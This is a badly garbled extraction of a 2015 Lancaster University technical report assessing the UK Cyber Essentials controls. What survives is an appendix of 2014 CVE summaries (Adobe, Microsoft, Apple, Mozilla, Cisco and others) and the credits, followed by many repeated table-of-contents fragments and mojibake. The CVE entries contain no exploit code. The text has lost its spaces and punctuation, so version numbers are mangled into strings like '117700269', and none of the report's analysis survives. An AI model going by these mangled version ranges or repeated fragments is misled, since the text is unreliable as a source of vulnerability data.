CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo

CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495

CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors

CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors

CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014

CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532

CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors

CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in

Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo

CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo

CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument

CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument

CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet

CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1

CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL

CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages

CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive

CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit

executable file for a crafted application

CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4

CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page

CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors

CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors

CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection

CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls

CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away

CVE-2014-1701

The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events

CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion

CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation

CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo

CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo

CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo

CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo

CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network

CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309

CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494

CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx

CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418

CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element

CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors

CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo

CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo

CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo

CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo

CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo

CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo

CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file

CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack

CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function

CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo

CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist

CVE-2014-3814

The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP

CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket

CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password

CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests

CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo

CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory

corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo

CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo

CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo

CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document

CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by

an a3 01 5b ff byte sequence

CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication

CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate

CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo

CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors

CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork

CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL

CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo

CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message

CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService

CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets

CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code

CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c

CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows

and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158

CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site

CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo

CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460

CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014

CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo

CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses

Analysis of Cyber Essentials on High Profile Vulnerabilities

``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References

Cyber Controls Applicability

CVE Details

Survey Responses

ContributorsDr Jose M Such (Principal Investigator)John VidlerTim SeabrookProf Awais RashidSecurity LancasterInfolab21 SCCLancaster UniversityLancasterLA1 4WAUnited Kingdom

Cite asSuch JM Vidler J Seabrook T Rashid A Cyber Security ControlsEffectiveness A Qualitative Assessment of Cyber Essentials TechnicalReport SCC-2015-02 Security Lancaster Lancaster University 2015

AcknowledgementsThis Cyber Security research project was funded by the UKGovernment

DisclaimerThis material is provided for general information purposes only Youshould make your own judgement as regards use of this material andseek independent professional advice on your particular circumstancesNeither the publisher nor the author nor any contributors assumeany liability to anyone for any loss or damage caused by any error oromission in the work whether such error or omission is the result ofnegligence or any other cause

References 13

CVE Details 19

Survey Responses 27

Recommendations

IntroductionC

MethodologyT

Data Collection

Interviews

Survey

Vulnerabilities

AnalysisT

Case Studies

Survey Responses

CVE-2014-6271[13]

CVE-2014-6271[12]

ldquoSuperfishrdquo

CVE-2014-6271[14]

Threat Analysis

ConclusionsT

Additional Tools

Recommendations

terminologyhtml

uninstall

2014-0160 2014

2014-6271 2014

bughtml April 2014

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

References 13

CVE Details 19

Survey Responses 27

Recommendations

IntroductionC

MethodologyT

Data Collection

Interviews

Survey

Vulnerabilities

AnalysisT

Case Studies

Survey Responses

CVE-2014-6271[13]

CVE-2014-6271[12]

ldquoSuperfishrdquo

CVE-2014-6271[14]

Threat Analysis

ConclusionsT

Additional Tools

Recommendations

terminologyhtml

uninstall

2014-0160 2014

2014-6271 2014

bughtml April 2014

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

Recommendations

IntroductionC

MethodologyT

Data Collection

Interviews

Survey

Vulnerabilities

AnalysisT

Case Studies

Survey Responses

CVE-2014-6271[13]

CVE-2014-6271[12]

ldquoSuperfishrdquo

CVE-2014-6271[14]

Threat Analysis

ConclusionsT

Additional Tools

Recommendations

terminologyhtml

uninstall

2014-0160 2014

2014-6271 2014

bughtml April 2014

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

IntroductionC

MethodologyT

Data Collection

Interviews

Survey

Vulnerabilities

AnalysisT

Case Studies

Survey Responses

CVE-2014-6271[13]

CVE-2014-6271[12]

ldquoSuperfishrdquo

CVE-2014-6271[14]

Threat Analysis

ConclusionsT

Additional Tools

Recommendations

terminologyhtml

uninstall

2014-0160 2014

2014-6271 2014

bughtml April 2014

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

MethodologyT

Data Collection

Interviews

Survey

Vulnerabilities

AnalysisT

Case Studies

Survey Responses

CVE-2014-6271[13]

CVE-2014-6271[12]

ldquoSuperfishrdquo

CVE-2014-6271[14]

Threat Analysis

ConclusionsT

Additional Tools

Recommendations

terminologyhtml

uninstall

2014-0160 2014

2014-6271 2014

bughtml April 2014

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

AnalysisT

Case Studies

Survey Responses

CVE-2014-6271[13]

CVE-2014-6271[12]

ldquoSuperfishrdquo

CVE-2014-6271[14]

Threat Analysis

ConclusionsT

Additional Tools

Recommendations

terminologyhtml

uninstall

2014-0160 2014

2014-6271 2014

bughtml April 2014

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

AnalysisT

Case Studies

Survey Responses

CVE-2014-6271[13]

CVE-2014-6271[12]

ldquoSuperfishrdquo

CVE-2014-6271[14]

Threat Analysis

ConclusionsT

Additional Tools

Recommendations

terminologyhtml

uninstall

2014-0160 2014

2014-6271 2014

bughtml April 2014

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

Survey Responses

CVE-2014-6271[13]

CVE-2014-6271[12]

ldquoSuperfishrdquo

CVE-2014-6271[14]

Threat Analysis

ConclusionsT

Additional Tools

Recommendations

terminologyhtml

uninstall

2014-0160 2014

2014-6271 2014

bughtml April 2014

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

Survey Responses

CVE-2014-6271[13]

CVE-2014-6271[12]

ldquoSuperfishrdquo

CVE-2014-6271[14]

Threat Analysis

ConclusionsT

Additional Tools

Recommendations

terminologyhtml

uninstall

2014-0160 2014

2014-6271 2014

bughtml April 2014

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

CVE-2014-6271[13]

CVE-2014-6271[12]

ldquoSuperfishrdquo

CVE-2014-6271[14]

Threat Analysis

ConclusionsT

Additional Tools

Recommendations

terminologyhtml

uninstall

2014-0160 2014

2014-6271 2014

bughtml April 2014

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

CVE-2014-6271[13]

CVE-2014-6271[12]

ldquoSuperfishrdquo

CVE-2014-6271[14]

Threat Analysis

ConclusionsT

Additional Tools

Recommendations

terminologyhtml

uninstall

2014-0160 2014

2014-6271 2014

bughtml April 2014

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

Threat Analysis

ConclusionsT

Additional Tools

Recommendations

terminologyhtml

uninstall

2014-0160 2014

2014-6271 2014

bughtml April 2014

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

ConclusionsT

Additional Tools

Recommendations

terminologyhtml

uninstall

2014-0160 2014

2014-6271 2014

bughtml April 2014

nrsquot

rsquotIn

rsquotin

nrsquot

rsquotin

nrsquot

and CVE-2013-1374

CVE-2013-3206

CVE-2013-4782

CVE-2014-1701

CVE-2014-3814

Survey Responses

Executive Summary

Introduction

Aims

Methodology

Data Collection

Vulnerabilities


Analysis


Case Studies

Survey Responses


``ShellShock

``Heartbleed

``Superfish

Threat Analysis

Conclusions

Additional Tools


Recommendations

References


CVE Details

Survey Responses

terminologyhtml

uninstall

2014-0160 2014

2014-6271 2014

bughtml April 2014

nrsquot

rsquotIn

rsquotin

